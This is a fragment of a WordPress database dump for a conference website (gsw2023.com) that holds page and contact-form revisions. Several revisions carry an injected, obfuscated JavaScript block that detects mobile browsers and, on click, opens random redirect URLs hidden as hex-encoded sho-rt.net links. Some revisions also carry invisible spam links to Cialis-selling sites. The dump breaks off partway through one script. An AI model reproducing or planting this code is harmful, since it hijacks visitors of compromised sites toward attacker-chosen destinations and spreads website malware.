link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-09-16 14:38:10','2023-09-16 14:38:10','',3066,'https://gsw2023.com/?p=5480',0,'revision','',0),
(5481,1,'2023-09-16 22:41:11','2023-09-16 14:43:44','','GSW2023','','publish','closed','closed','','day1','','','2023-09-16 22:41:11','2023-09-16 22:41:11','',0,'https://gsw2023.com/?p=5481',7,'nav_menu_item','',0),
(5483,0,'2023-10-03 12:53:27','2023-10-03 12:53:27','<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisbro.cc/\">犀利士</a>\n</span>','Session Program','','inherit','closed','closed','','5383-revision-v1','','','2023-10-03 12:53:27','2023-10-03 12:53:27','',5383,'https://gsw2023.com/?p=5483',0,'revision','',0),
(5484,0,'2023-10-03 12:53:28','2023-10-03 12:53:28','[fluentform id=\"1\"]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialismo.com/\">犀利士</a>\n</span>x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Contact Form','','inherit','closed','closed','','5364-revision-v1','','','2023-10-03 12:53:28','2023-10-03 12:53:28','',5364,'https://gsw2023.com/?p=5484',0,'revision','',0),
(5485,0,'2023-10-03 12:53:28','2023-10-03 12:53:28','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 